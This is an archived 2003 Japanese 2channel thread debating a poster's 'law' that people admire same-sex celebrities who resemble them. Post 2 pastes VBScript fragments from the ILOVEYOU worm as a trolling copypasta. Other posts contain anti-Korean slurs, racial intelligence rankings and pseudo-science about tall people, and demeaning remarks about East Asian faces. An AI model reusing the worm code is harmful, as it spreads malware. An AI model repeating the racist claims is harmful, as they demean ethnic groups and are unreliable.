2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

凄い法則を発見した!!

1 :スリムななし(仮)さん:03/09/08 04:30
みんな同性の有名人に『カッコイイ』とか『可愛い』とか思う人はいる?
みんな自分に顔や雰囲気が似てる有名人を自然に好きになるって言う法則を発見したんだ。
たとえば俺の知り合いに織田祐二がカッコイイって言ってる奴がいたんだ。で、よく考えてみると
そいつの顔の雰囲気は織田祐二っぽい事に気付いた。決して似てるとは言わないけど雰囲気がね。
で、他の知り合いも考えてみたら好きって言う芸能人とそいつの顔や雰囲気がみんな似てるんだ。

みんなの周りはどう?


2 :スリムななし(仮)さん:03/09/08 04:34
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")



3 :1:03/09/08 04:37
↑意味湧かんねーよ

4 :スリムななし(仮)さん:03/09/08 04:42
みんな同性の有名人に『カッコイイ』とか『可愛い』とか思う朝鮮人はいる?
みんな自分に顔や雰囲気が似てる朝鮮人を自然に好きになるって言う法則を発見したんだ。
たとえば俺の知り合いに木村拓哉がカッコイイって言ってる奴がいたんだ。で、よく考えてみると
木村拓哉の顔は朝鮮人だって事に気付いた。決して似てるとは言わないけど雰囲気がね。
で、他の知り合いも考えてみたら好きって言う朝鮮人とそいつの顔や雰囲気がみんな似てるんだ。

みんなの周りはどう?

5 :1:03/09/08 04:42
誰も反応してくれないよっ

6 :1:03/09/08 04:44
>>4
俺の法則をコピペにすんなよっ。凄い発見なんだから

7 :1:03/09/08 04:47
反応してよ!!

8 :スリムななし(仮)さん:03/09/08 04:50
>>3
そいつはちょっと覚えた事をひけらかしたい厨だからほっときな
今更恥ずかしい

9 :1:03/09/08 04:53
どうゆうこと?>>2はいったいなんなの?気になるよう!!


10 :スリムななし(仮)さん:03/09/08 04:53
お馬鹿さんな>>1に萌え

11 :スリムななし(仮)さん:03/09/08 04:53
>>1
俺もそう思う

12 :スリムななし(仮)さん:03/09/08 04:54
《同一化現象》〜自分と似ている人が好き

人間は考え方、行動、外見、しゃべり方、リズムなどが自分と似ている人を好
きになります。したがって互いに相手に好かれようとするカップルなどはお互
いに同一化しようという意志が働くため、考え方、行動、外見、しゃべり方、
リズムなどが同調してきます。同調がうまく成立すると長時間一緒に過ごして
いても不快感はなくなり、逆 に快感を感じるようになります。したがってこ
のようなカップルはPEAが出なくなっても互いに引きあえるようになります。

http://www.so-net.ne.jp/CYBERJAPAN/contents/love/dictionary/ta.html

また、プライスとヴァンデバーグ(1982)は「一般的に、配偶者の外見の
特徴には、低〜中程度の類似性が確認される」と報告している。


13 :1:03/09/08 04:55
>>11
そうでしょ!?そう思うでしょ?あなたは誰が好きなの?!

14 :スリムななし(仮)さん:03/09/08 04:57
>>13
小倉優子

15 :1:03/09/08 05:01
>>12
ええええ!?そんなのがあるの!?じゃあ俺の法則じゃないってこと!?

>>14
そうなんだ。じゃあ、あなたは小倉優子似てるんだ。って違うよ!!同性だよ同性でカッコイイと思う人だよっ


16 :スリムななし(仮)さん:03/09/08 05:05
朝から一生懸命な>>1に萌え

17 :1:03/09/08 05:08
みんなちゃんと俺の発見について語りあってよ!>>12をパクった訳じゃないんだよ。俺が自分で発見したんだよ


18 :1:03/09/08 05:14
>>2が気になって寝れないよ。ぶっちゃけ怖いよ


19 :スリムななし(仮)さん:03/09/08 05:15
>>1
今何歳?徹夜?

20 :スリムななし(仮)さん:03/09/08 05:16
ちなみに1君は誰をカッコいいと思うの?

21 :1:03/09/08 05:21
>>19
19歳だよ。そろそろ寝ようと思ったのに>>2の正体おしえてよ

>>20
そんな事ここで言えるはず無いじゃん。みんなでバカにするんでしょ?それに俺の場合は似てないもん

22 :1:03/09/08 05:34
誰も驚いてくれないから寝ます!また来ます!

23 :スリムななし(仮)さん:03/09/08 05:35
なんか>>1かわいいなー。

24 :スリムななし(仮)さん:03/09/08 05:38
>>23禿同。

25 :スリムななし(仮)さん:03/09/08 05:39
こんな弟欲しいかも

26 :スリムななし(仮)さん:03/09/08 08:04
>>1が好きだ

27 :スリムななし(仮)さん:03/09/08 08:08
それより誰か驚いてやれよ・・・・。

28 :スリムななし(仮)さん:03/09/08 08:14
    /\___/ヽ   ヽ
   /    ::::::::::::::::\ つ
  . |  ,,-‐‐   ‐‐-、 .:::| わ
  |  、_(o)_,:  _(o)_, :::|ぁぁ
.   |    ::<      .::|あぁ
   \  /( [三] )ヽ ::/ああ
   /`ー‐--‐‐―´\ぁあ




29 :スリムななし(仮)さん:03/09/08 08:17
>>1好きだよー!

30 :スリムななし(仮)さん:03/09/08 08:22
顔だろ?当たり前じゃん。自分の顔はほぼ毎日鏡で見てるんだから
似た顔に親近感感じる⇒無意識的に好きになるってよくある話だよ
自分と違う顔を好きになることもあるけどだからといって自分と同じ系統の顔が嫌いな
わけじゃない。

31 :スリムななし(仮)さん:03/09/08 08:23
いいかげん誰かマジレスしてやれよこのホモ野郎供!
どうせ1は漏れのモノだぞ・・・!


32 :スリムななし(仮)さん:03/09/08 08:24
>>1の法則を用いた簡単美容法!

かっこいい同性の人を見つける。
どんな手段を使ってでもその人に自分を好き or カッコイイと思ってもらう。
そうすると、アラ不思議。>>1の法則により貴方は美人美男子何にでもなれます!

33 :スリムななし(仮)さん:03/09/08 08:35
http://user.auctions.yahoo.co.jp/jp/show/auctions?userID=tamagomaru1&u=tamagomaru1

34 :スリムななし(仮)さん:03/09/08 08:38
よっしゃ!>>1よ!
これから久しぶりに俺とキャッチボールするか!!

35 :スリムななし(仮)さん:03/09/08 08:51
>>34その前に漏れと背中を流し合おうぜ!

36 :スリムななし(仮)さん:03/09/08 08:53
その逆もあるなー。
「○○に似てるね」っていわれるとその芸能人好きになっちゃって、
その芸能人っぽく振舞ってみたり。なんか意識しちゃう。
>>1かわいい♪

37 :スリムななし(仮)さん:03/09/08 08:54
いやその前に俺と連れションしようぜ!

38 :スリムななし(仮)さん:03/09/08 09:00
俺とセクースしようぜ

39 :スリムななし(仮)さん:03/09/08 09:20
何故か1大人気だな・・・。






俺も好きだけど。

40 :スリムななし(仮)さん:03/09/08 09:34
<背が高い奴のデメリット>178くらい以上

・足腰が弱りやすく、老後は寝たきり・介護等で人並以上に苦労する傾向アリ

・マルファン症候群など遺伝子変異による疾患が発生する傾向アリ

・知能が比較的低い傾向アリ
 生物学的には、一般的な知能は体の大きさに比べて脳がどれだけ大きいかで決定される。
 (モンゴロイド>コーカソイド>ネグロイド)

・虚弱体質になる傾向アリ
 大きな身体を維持するためには大きく丈夫な内臓が必要である。
 大柄ではない人と同じ大きさの内臓ならば明らかに虚弱体質となる。
 大きな身体は維持するだけで余分なエネルギーを必要とし、常に疲れやすい。

・激しい頭痛が頻発する傾向アリ(中年期以降に顕著)

・癌の発病率は低身長の数倍

・ブサイクは目立つ。

41 :スリムななし(仮)さん:03/09/08 09:35
なんだかんだ言って>>1が一番好きなタイプだ

42 :スリムななし(仮)さん:03/09/08 09:49
>>1をモノにしたければ漏れを倒してからに汁!

43 :スリムななし(仮)さん:03/09/08 10:16
>2
はNortonとかが付いてて2chBrowserを使ってると、ウイルスと誤認して勝手にログを消してしまうコピペです。

44 :スリムななし(仮)さん:03/09/08 12:46
>>1と同じ口調の>>1を以前どっかのスレでみたよ。

45 :スリムななし(仮)さん:03/09/08 21:41
>>1
恥ずかしがってないで出ておいで

46 :スリムななし(仮)さん:03/09/08 23:55
考えてみれば私の周りもみんな>>1の言ってる法則に当てはまるよ。すごいよこれは。大発見だよ


47 :1:03/09/08 23:59
↑のレスは俺だけど、みんなこんな感じでレスしてくれると思ったのに!!
そんな俺の事よりちゃんとみんな法則について語ってよ!ちょっと照れちゃったじゃんっ

48 :スリムななし(仮)さん:03/09/09 00:01
>>1と同じ口調の知り合いがいる。

49 :1:03/09/09 00:11
それでみんな俺の法則に驚いて。 【あなたは】凄い法則を発見したpart4【誰似?】 まで進んで、
『part1の1です。いつの間にかpart4までいってたんですね』とか言ってみたかったのに!

50 :1:03/09/09 00:20
なんか俺必死だな。もうそろそろ>>1必死だな( ´,_ゝ`)プッとか言われんのかな。こうゆうの糞スレってゆうのかなぁ



51 :スリムななし(仮)さん:03/09/09 00:22
>>1
aiko似のでaiko好きなコを二人知っているよ。
>>1の法則に当てはまるよ。

52 :1:03/09/09 00:27
>>51
でしょ?!俺の法則つかえるだしょ?俺の知り合いはほとんど当てはまるんだよ

53 :スリムななし(仮)さん:03/09/09 00:29
心理学的に当たり前田のクラッカーなことです。

54 :1:03/09/09 00:39
当たり前の事だったんだ。じゃあ俺の法則は大発見でもなんでもないって事だったんだ・・・じゃあこのスレも糞スレってことか

55 :1:03/09/09 00:43
ゲロッパ!!!

56 :1:03/09/09 00:55
ゲロッパ!!!


57 :スリムななし(仮)さん:03/09/09 01:00
ドロンパ!!!

58 :1:03/09/09 01:50
削除依頼してきます

59 :1:03/09/09 01:55
誰も止めてくれないよっ!

60 :1:03/09/09 01:58
ヽ(`Д´)ノ

61 :スリムななし(仮)さん:03/09/09 01:58
(・∀・)ニヤニヤ

62 :スリムななし(仮)さん:03/09/09 02:03
>>1が前に立てたスレを知っている。


63 :スリムななし(仮)さん:03/09/09 02:04
福岡 佐賀 長崎 熊本 大分 宮崎 鹿児島みたいな田舎には絶対住みたくねーな

つーか そんなことより

九州とかから出てきた香具師どもが

かっぺ出身を知られるのが恥ずかしいからなのかどうか

しらないが東京で エセ標準語や 大阪で エセ関西弁を

あたかも現地人ですよ的に出身地詐称して話してる香具師らが

超うぜー

64 :1:03/09/09 02:13
>>62
スレは滅多に立てないもん。こないだフジの実況に立てた位だよ



65 :1:03/09/09 02:27
( ´・ω・)

66 :スリムななし(仮)さん:03/09/09 02:47
悲惨な>>1

67 :スリムななし(仮)さん:03/09/09 02:52
必死な>>1

68 :スリムななし(仮)さん:03/09/09 07:56
>>1
常識だから

69 :スリムななし(仮)さん:03/09/09 08:48
おまいら>>1をいじめるなよ。かわいい奴じゃないか

70 :スリムななし(仮)さん:03/09/09 08:53
>>69禿同。

71 :スリムななし(仮)さん:03/09/09 11:10
またお母さんから生まれてきますように・・・

離婚するべきか悩む毎日を過ごしていたある日、
娘がお布団に入って『おやすみ』を言った後、
お祈りするように本当に小さな声で、神様にお願いしていたひとことです。



72 :スリムななし(仮)さん:03/09/09 11:23
おい>>1
今晩仕事で遅くなるからご飯先にすませてくれ。

73 :スリムななし(仮)さん:03/09/09 18:02
 

74 :スリムななし(仮)さん:03/09/09 19:52
マジレスだけどそう思う
仲の良いヤツは性格が似たようなヤツが多いのと同じだな

75 :スリムななし(仮)さん:03/09/09 21:50
ああ、それはあるな

76 :スリムななし(仮)さん:03/09/09 22:17
あーでもわたしは1サンに同意。
そんな気がする。


77 :スリムななし(仮)さん:03/09/09 22:22
自演必死だねw

78 :スリムななし(仮)さん:03/09/09 22:32
その法則は何か役に立つのだろうか

79 :スリムななし(仮)さん:03/09/09 22:50
こんな話し俺が小学〜中学の頃にみんな言ってたよ。
かれこれ5年くらい前にさ。1は大発見みたいに言っててカワイイと思った。(プ

80 :1:03/09/10 00:23
 |
 |ω・`) 
 |⊂ )    
 | 丿    


81 :スリムななし(仮)さん:03/09/10 00:27
>>2
市ね!

82 :スリムななし(仮)さん:03/09/10 11:24
俺の場合は自分と全然違うタイプの男をカッコイイと思うけどな。
やっぱ人それぞれじゃね?

83 :スリムななし(仮)さん:03/09/10 11:24
>>82
そりゃ、おまえがブサイクだからじゃ?

84 :スリムななし(仮)さん:03/09/10 11:28
>>1
極めて正常な法則です

85 :スリムななし(仮)さん:03/09/10 11:32
>>1
ぜったい関係ない
1に同意してるやつは「あっ自分もあの人と雰囲気にてるんだ〜(嬉)」
とか喜んでるから。
あほか。似てるわけねーだろw

86 :スリムななし(仮)さん:03/09/10 11:32
当然だよな。クラスとかでも、大体同類同士が集まるし。
ヲタはヲタ同士。DQNはDQN同士。普通の事ですな。

87 :スリムななし(仮)さん:03/09/10 11:34
>>85
関係あるよ。もちろん似てると言っても、
芸能人なんかよりはだいぶ劣るだろうが、
系等としてはそうだ。

88 :スリムななし(仮)さん:03/09/10 11:38
>>85
おまえって友達いなそうだな。
小さい頃からハブられて、女だけじゃなく
男同士でさえもマトモに相手にされなかったろ?

89 :85:03/09/10 11:45
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
   /::::::::::::::::::::::::::::::::::::::::::::::::::::::::\
  /::::::::::::::/|:::::::::/ノ::::::::/ヽ人:::::::::::::ヽ    
 /:::::::::::::::/ .|::://∧::::ノ    ヾ:::::::::::::ヽ  
 |::::::::::::::/  |/ |ノ  |/      |:::/ヾ::::|  
 |:::::::::::/ ;;;;;;;;;;;;      ;;;;;;;;;;;;; V .|:::::|
 |::::::::/ ̄ ̄ ̄ ̄ヽ===/ ̄ ̄ ̄ ̄ヽ ヽ:::|
 | ::=ロ  -=・=-  |  |  -=・=-  ロ=:::|
 |:::/丶      /ノ  ヽ      / ヽ|  
 |/  `─── /   ` ───    .|   
...|         (●_●)        .|  ふざけんなよ!
..|           l l          | 
.|       .__-- ̄`´ ̄--__      .|
|         -二二二二-        |.
.\                     /
  \      _- ̄ ̄ ̄-_      /  
    \              /      
    /| \________/ |\ 
  / ̄\ \       /  / ̄\


90 :スリムななし(仮)さん:03/09/10 12:06
ってことはモーヲタはみんなモーニング娘みたいな顔なんか…なるほどな…

91 :スリムななし(仮)さん:03/09/10 12:08
>90
>>1に同性の有名人って書いてあるよ。

92 :スリムななし(仮)さん:03/09/10 12:12
90は頭悪そうだな

93 :スリムななし(仮)さん:03/09/10 12:13
平均化の原理だなぁ。初め見たとき不細工だと思った奴も、
見慣れてくればそう思わなくなるのは、人間は今まで見た
顔の平均から美的感覚が作られるからだそうだ。だから
普段見ているメディアや、自分と自分の家族の顔などの
影響を強く受けると。そういった平均的な美しい顔を見ると、
脳が強く反応するそうだ。自分と似た顔の奴と結婚しやすいのも
ここらへんが影響してるな。自分の顔なんて鏡で毎日見るしな。


94 :スリムななし(仮)さん:03/09/10 12:16
>92
うん。
でも、案外頭良いかもしれない。どっちだろうね。
90のたった一行だけでは分からないや。
誰にでも「うっかり」ってあるしね。

95 :スリムななし(仮)さん:03/09/10 12:18
そりゃあ、誰しも自分が好きだし可能な限り自分を肯定したいだろ>1

2chでさえ、自分の存在意義と正当性の為に必死なブサ男が多いのを
見ればわかるだろ

96 :●のテストカキコ中:03/09/10 12:31
http://ula2ch.muvc.net/ (このカキコは削除しても良いです)

97 :スリムななし(仮)さん:03/09/11 18:01
どどど

98 :スリムななし(仮)さん:03/09/11 18:05
童貞ちゃうわ

99 :スリムななし(仮)さん:03/09/11 18:43
自分の顔が好きな人は自分の顔に似た人を、嫌いならコンプレックスな部分
が理想的な人を好きになるとか

自分の顔のパーツで好きな部分と嫌いな部分に無意識に判別し、
好きな部分に似たパーツを持つ顔の人を好きになるとか

100 :スリムななし(仮)さん:03/09/11 21:51
たいていの奴は何だかんだいっても自分の顔が
好きだろうけど

101 :スリムななし(仮)さん:03/09/11 21:53
>>99
それわかるわ。自分の顔の好きなパーツを持っていて、
自分の顔の嫌いなパーツを直したような顔を好むな。

102 :スリムななし(仮)さん:03/09/12 13:47
>>1の法則は間違っている

なぜなら私は小倉優子が好きだからだ

103 :スリムななし(仮)さん:03/09/12 17:48
>>102は男かな?男だったら
>>11>>13-15

104 :スリムななし(仮)さん:03/09/12 18:10
俺はベッカムがスゲー好きなんだけどw

105 :スリムななし(仮)さん:03/09/12 18:17
それはその人が憧れの同性の有名人に、無意識に似ようとしてるからじゃねーの?
俺は山Pがカッコイイっと思って、髪形とかいろいろ真似してたら
山Pにどことなく似てるねって、結構言われるようになったし

106 :スリムななし(仮)さん:03/09/12 18:32
>>104
じゃあお前の顔はベッカム系だ
>>105
お前は山Pだ

107 :スリムななし(仮)さん:03/09/12 18:56
こらこらプイ
こんな所で何してるの!帰るわよ…

108 :スリムななし(仮)さん:03/09/14 00:36
良スレage

109 :102:03/09/14 18:14
>>103
女だよ
女で小倉優子好きって変?
>>1の法則間違ってるよね

110 :スリムななし(仮)さん:03/09/15 15:38
全人類にあてはまることなんてないだろ。
この法則は10人中4、5人に当てはまれば良いくらいじゃね?

111 :スリムななし(仮)さん:03/09/15 15:47
トム・クルーズが好きだが、似ても似つかないな。

よく言われることだが、自分と似てる奴には親近感を覚える
が魅力を感じない。
似ていない奴には、魅力を感じる一方で、反発心も感じるらしい。

112 :スリムななし(仮)さん:03/09/15 15:51
俺も。スターウォーズのアナキン役の青年とか好きだけど
似ても似つかないよ。

113 :スリムななし(仮)さん:03/09/15 15:59
>>1 そのとうり。。。 生物学的にも証明されてるから

114 :スリムななし(仮)さん:03/09/15 16:01
私は柴咲コウが好きだけど、言われてみれば共通点あるかも

115 :スリムななし(仮)さん:03/09/15 16:03
私も柴崎コウ好きだけど全然似てない


116 :スリムななし(仮)さん:03/09/15 16:04
発見ていうか昔からいわれてることやん。。。

117 :スリムななし(仮)さん:03/09/15 16:14
俺はモナーが好きだ

118 :スリムななし(仮)さん:03/09/15 16:14
>言われてみれば共通点あるかも


いやいやいやいやw
無いから。決して無いから(藁




119 :スリムななし(仮)さん:03/09/15 16:16
スレッドタイトル:【美容板】hyde、成宮マンセー族は不細工【これ定説】
名前: スリムななし(仮)さん
E-mail:
内容:
何かとこの二人を出し比べたがるブサちゃん達顔晒してみてよ
きっと単に憧れてるだけで不細工なんだろうなぁ…

ハイドなんてチビの薄毛の肌ボロボロの光修正+メイク、成宮なんて爬虫類顔の穴貫通男
こいつらお前等が思ってる程よくないよ

まぁフォロワーはどんなもんか見てみたいし晒してみなさいってこった
それなりによかったらいつもお前等が口にしてるそれなりの評価が出るだろうよ




誰か立ててみ
フォロワー必死になってそれなりにおもしろいと思うよ(w
俺立てれんかったわ

120 :スリムななし(仮)さん:03/09/15 16:21
玉木宏って人が最近カコイイと思う

121 :スリムななし(仮)さん:03/09/15 16:35
>>102
おそらく、お前がヲタで小倉優子系の顔を
長く見たからであろう。
美意識は自分の見た物の平均で形づくられる。

122 :スリムななし(仮)さん:03/09/15 16:37
>>118
あるって。小さい頃から友達の好きな
芸能人とか聞いてると、ヤッパ雰囲気が同系列。

123 :ビオラ:03/09/15 16:38
>119 光修正って何よ?
ハイドは好きくもキライでもないけど、そこまでひどくはないんじゃない〜
でも、年取るとあかんけどね。それは確か。
年とるとへたれるのは、めっちゃ多い。
逆に若くてもイケメンだったのに
年取って渋いのはなかなかおらんで。

124 :スリムななし(仮)さん:03/09/15 16:40
>>1
こんなの常識だよ。
哺乳類は、近親を避けるために兄弟を好きには
ならなくても、外見の似たイトコが最も好みになる。
まぁ、人間の場合メディアの操作の影響もあるが。

125 :スリムななし(仮)さん:03/09/15 16:42
おれ堂本剛ファンだけどやっぱ共通点があるかもしれない
人見知りとかチビとか鬱っぽいところとか・・・

126 :スリムななし(仮)さん:03/09/15 16:46
自分と近すぎる遺伝子も離れすぎた遺伝子も危険。
イトコあたりの類似した人間を好きになるのは
自然の反応。

127 :スリムななし(仮)さん:03/09/15 16:51
高校の時、好きな芸能人とかみんなに聞いたけど
自分に似てる奴を好みにしてたわ。

乙葉好きの男とか、目は細くても顔のフックラ感や
輪郭が結構似てたわ。多分、そいつは自分の細い目を
嫌いだったろうけど、自分の嫌いなパーツと好きなパーツ
で区分けしてるんだろう。



128 :スリムななし(仮)さん:03/09/15 17:05
>>118
いや、共通点あるよ。目つき悪いとことか(ぇ
ていうか私の顔見た事ないのに、どうして共通点ないって分かるの?

129 :スリムななし(仮)さん:03/09/15 17:10
内面的に似てるってのもあるのかな?
例えばアーティスト系とか。

ま、考えてみれば当たり前だろうけど


130 :スリムななし(仮)さん:03/09/15 17:15
まぁ、こんなもんは発見と言うものでもないわな
ずっと昔から言われてるし・・・

131 :スリムななし(仮)さん:03/09/15 17:22
1は可愛いな〜
でも、発見というもんでもなく
普通の事だよ

132 :スリムななし(仮)さん:03/09/15 17:26
パンピーの男女間でも、共通顔の異性好きになるの?

133 :スリムななし(仮)さん:03/09/15 17:35
>>132
結婚相手の顔写真を調査したら、中程度の
相関があったんだとさ。

134 :スリムななし(仮)さん:03/09/15 18:33
自分が嫌いな人は、理想像に似ている人を好きになるんだよ。
トムクルーズが好きな人は、大抵自分の顔が嫌いなのか、それとも
美男美女じゃないか?

135 :スリムななし(仮)さん:03/09/15 18:43
そんなこと言い出したら何でもありになっちゃうじゃんw
リンゴを見て食べたくなる人はリンゴが好きか
お腹が空いてるかじゃないか?みたいなw
どっちにころんでも・・・w

136 :スリムななし(仮)さん:03/09/15 21:23
>>135
そんなことないだろ。曲解しないように。

トムクルーズが好きな人は
一重で自分が嫌いな人(若干自分が好きな人は切れ長の目を好むので除外)
二重で自分を不細工だと思っている人
二重で自分に満足しているが、トムクルーズなどの外人系にあこがれてる
二重の美男美女で自分に似ている(と思ってる勘違い野郎)

137 :スリムななし(仮)さん:03/09/15 21:38
自分の綺麗な部分だけしか好きになれないわけでもないしな。
俺は自分の顔が微妙に不細工だと知っているが、好きでたまらない。
「ああ、これが自分の一部か」
と思うと、いとおしくなる。

138 :スリムななし(仮)さん:03/09/15 21:41
俺がカッコイイと思う人

稲葉浩志
Gackt
福山まさはる
トムクルーズ
豊川悦司

この人達に顔の共通点ないような・・・

139 :スリムななし(仮)さん:03/09/15 21:46
>>138
御前は一重で、自分の顔が大嫌いなんじゃないか?違ったらごめん

140 :スリムななし(仮)さん:03/09/15 21:50
>>139
超正解です。
なんでなんでわかるdなぁぁぁ

141 :スリムななし(仮)さん:03/09/15 21:53
福山
大沢たかお
少年ディカプリオ
トムクルーズ
ファルコン

142 :スリムななし(仮)さん:03/09/15 22:02
田代まさし

143 :スリムななし(仮)さん:03/09/15 22:21
>>140
ほんとかよ!?

144 :スリムななし(仮)さん:03/09/15 23:29
>>143
マジです。本当にネタじゃなくてマジです。
坂口健二もカッコイイと思う。

145 :スリムななし(仮)さん:03/09/16 04:15
>自分が嫌いな人は、理想像に似ている人を好きになるんだよ。
これアル!
しかも>>1と同じ事を中学生の時思ったw
もしかして>>1さんそのくらいの年かな?
異性芸能人は当てはまらないけど、同性芸能人だと案外当てはまる。
自分に似てるというか、自分を良くしたら〜みたいな。

もしかしたら、逆になりたい芸能人に自分を近づけてるだけなのかもしれないけど。

146 :スリムななし(仮)さん:03/09/16 11:29
結婚相手も顔が似てるって言うしな。
確かに顔が似たカップルは仲が良さそうだ。

147 :スリムななし(仮)さん:03/09/16 11:45
おれの好きなタイプは黒髪の外人。
何人がいいんだろうか・・・

148 :スリムななし(仮)さん:03/09/16 11:56
半島の

149 :スリムななし(仮)さん:03/09/16 12:07
朝鮮半島の黒髪の外人か・・・
確かに147にはお似合いだな

150 :スリムななし(仮)さん:03/09/17 14:42
俺がカコイイと思う人

トム・クルーズ
玉木宏
ハイド
ヘイデン・クリステンセン
ジョニーデップ

151 :スリムななし(仮)さん:03/09/17 17:27
>>1
俺の調査でも、同じ結果だわ。
好きな芸能人男女とも聞いても、その法則に行き着くな。
とんでもないブサイクの場合は、典型的な美形好きってのも
あるけど。


152 :スリムななし(仮)さん:03/09/18 00:19
俺のまわりだとそうでもないなぁ。。。

153 :スリムななし(仮)さん:03/09/18 02:39
>>152
どんなのよ

154 :スリムななし(仮)さん:03/09/18 22:09
この法則はあんまアテにならないな

155 :スリムななし(仮)さん:03/09/19 04:28
なんかわかる気がする。
私、濃顔なんですが、濃い系好きってか周りより免疫があるかも。
平井堅とか、稲葉とか、みんなに「濃い系だよね〜」と言われるまで濃いと気付かなかった。
芸能人は顔に癖のあるタイプが好きだしなあ。松雪とか。

156 :スリムななし(仮)さん:03/09/19 06:58
仲間由紀恵が.カワ。゚+.(・∀・)゚+.゚イイと思うようになった。
似てるって言われたから。二人に言われて幸せ〜。

もっと前は中山忍に
似てると言われてた時があったけど
大きくて丸い目の人には好感持つなー。
キャラクターも控えめそうな人。

157 :スリムななし(仮)さん:03/09/19 08:13
>156
山田花子に似てるって言われたら、やっぱ花子のも好感を持つ??

158 :スリムななし(仮)さん:03/09/19 09:24
>>157
156ではないけど

上の方で言ってる人何人か居たけど、
自分を良くした顔に似てる人って事じゃない?
花子が理想に近ければ花子の顔も好感持てるんじゃないかな。

159 :スリムななし(仮)さん:03/09/19 11:20
>>155
俺も自分が濃い顔のせいか、まわりの奴より
濃い顔への耐性があるわ。拒絶反応が出ないって言うか。

160 :スリムななし(仮)さん:03/09/19 11:28
そりゃあるわw
俺も結構濃い目だけど、思い出したら
学生時代に俺の事をキモイと言った奴は、
全員平安時代の人間みたいに薄い顔してた。
なんか、一重でノッペリしたような顔。

161 :スリムななし(仮)さん:03/09/19 11:52
おれの好きなのは、ニコ・ロビンです。

162 :スリムななし(仮)さん:03/09/19 11:58
【配偶者間の魅力と顔の特徴には類似性が見られる】
シェパードとエリスは、地方新聞から36組の結婚写真のネガを入手した。
それぞれのパートナーの顔が別々にプリントされ、その72人すべての顔を、
どのくらい「顔立ちが良い」かという観点から、第三者の学生に評定させた。
その結果、配偶者同士の間には、統計的に高い相関関係が見られた。
シェパード達は、この相関を「驚くほどではないにしても、注目に値する」
と結論づけている。同じ年にキャヴィアたちの研究では、デート段階の
カップルにおいては、かなり低い相関が得られている。しかし、配偶者間
の魅力については、かなり高い相関関係があることを報告している。
「人間は一般的に【ルックスは自分にとって重要ではない】と言うが、
 行為をこの言葉を裏切る」(ハットフィールドとシュプレッヒャー、)
プライスとヴァンデバーグは、報告されている魅力の相関の大きさは、
「一般的に、配偶者の外見の特徴には、低〜中程度の類似性が観察される
というパターンとうまく適合する」と指摘している。

 〜講談社 レイ・ブル、ニコラ・ラムズイ著「人間にとって顔とは何か」より抜粋

つまり、軽いデート段階のカップルでは、あまり釣り合わないカップル
も多いが、本気の交際では魅力の釣り合いが取れ、結婚段階ではブサ男
とブスがかなり高確率で結婚するということ。また、夫婦の容姿はある
程度似ているということが統計的に言えるわけです。マッチング仮説と
ほぼ符合する結果ですね。


163 :スリムななし(仮)さん:03/09/19 12:17
http://page7.auctions.yahoo.co.jp/jp/auction/g5637955
http://page5.auctions.yahoo.co.jp/jp/auction/e31267799
http://page.auctions.yahoo.co.jp/jp/auction/60186532
http://page5.auctions.yahoo.co.jp/jp/auction/e31267799

サンプルってどうなのかな?気になる


164 :スリムななし(仮)さん:03/09/19 18:08
白人が黄色人種の外見を嫌う理由の
トップには目が細くて小さくて、何考えてるんだかわからなくて
薄気味悪いから好きになれないってのがくるよ。

165 :スリムななし(仮)さん:03/09/19 18:18
そうか、西川きよしが白人の嫁さんをゲットしたのは
あのギョロ眼のせいか。




166 :スリムななし(仮)さん:03/09/19 18:34
>>164
それも在日白人か現地白人かでまた変わってくるな。後者の影響が強いね。後者の場合
偏見強いから肌の色や髪の色にまで嫌う理由として言及するよ彼らは。
つまり黄色人種の持つものすべて。目鼻など数ある要因の1つに過ぎない。
男に限って言えば、結局嫌われる理由のトップはむしろ背の低さ、貧相さだったりする。

167 :スリムななし(仮)さん:03/09/19 18:40
まぁ、白人にモテてもな

168 :スリムななし(仮)さん:03/09/19 18:40
ギョロ目人種からすりゃ、一重細目は
キモくて当然だ罠

169 :スリムななし(仮)さん:03/09/19 18:42
だな

170 :スリムななし(仮)さん:03/09/19 18:45
ダウン症みたいだしな

171 :スリムななし(仮)さん:03/09/19 18:45
目鼻立ちから顔の輪郭まですべて自分達白人とは違うのだから。

に限定するほうが不自然と思われ
同着で顔全部とするのが自然。


172 :スリムななし(仮)さん:03/09/19 18:49
白人の優位を信じる白人は、黄色人種自体が嫌いなのです。原因追求など野暮。
但し一般論でどこが嫌い?
と言われれば「顔全部」だろうな。



173 :スリムななし(仮)さん:03/09/19 18:49
【配偶者間の魅力と顔の特徴には類似性が見られる】
シェパードとエリスは、地方新聞から36組の結婚写真のネガを入手した。
それぞれのパートナーの顔が別々にプリントされ、その72人すべての顔を、
どのくらい「顔立ちが良い」かという観点から、第三者の学生に評定させた。
その結果、配偶者同士の間には、統計的に高い相関関係が見られた。
シェパード達は、この相関を「驚くほどではないにしても、注目に値する」
と結論づけている。同じ年にキャヴィアたちの研究では、デート段階の
カップルにおいては、かなり低い相関が得られている。しかし、配偶者間
の魅力については、かなり高い相関関係があることを報告している。
「人間は一般的に【ルックスは自分にとって重要ではない】と言うが、
 行為をこの言葉を裏切る」(ハットフィールドとシュプレッヒャー、)
プライスとヴァンデバーグは、報告されている魅力の相関の大きさは、
「一般的に、配偶者の外見の特徴には、低〜中程度の類似性が観察される
というパターンとうまく適合する」と指摘している。

 〜講談社 レイ・ブル、ニコラ・ラムズイ著「人間にとって顔とは何か」より抜粋

つまり、軽いデート段階のカップルでは、あまり釣り合わないカップル
も多いが、本気の交際では魅力の釣り合いが取れ、結婚段階ではブサ男
とブスがかなり高確率で結婚するということ。また、夫婦の容姿はある
程度似ているということが統計的に言えるわけです。マッチング仮説と
ほぼ符合する結果ですね。

174 :スリムななし(仮)さん :03/09/19 18:52
白人が黄色人種の外見を嫌う理由の
トップには肌が黄色くてきったなくてとても同じ人間に見えない
から好きになれないってのが本音だと思うよ。

175 :スリムななし(仮)さん:03/09/19 18:54
肌が黄色い?
日焼けすりゃ、白人も似たようなもんだろ。

176 :スリムななし(仮)さん:03/09/19 18:54
一重細目人間のコンプレックスを刺激したようだな

>>164

177 :スリムななし(仮)さん:03/09/19 19:01
             ,.-'":::::::::::::::::::::::::::::::::::::::::::::::::',
         __,.、-''´:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::!
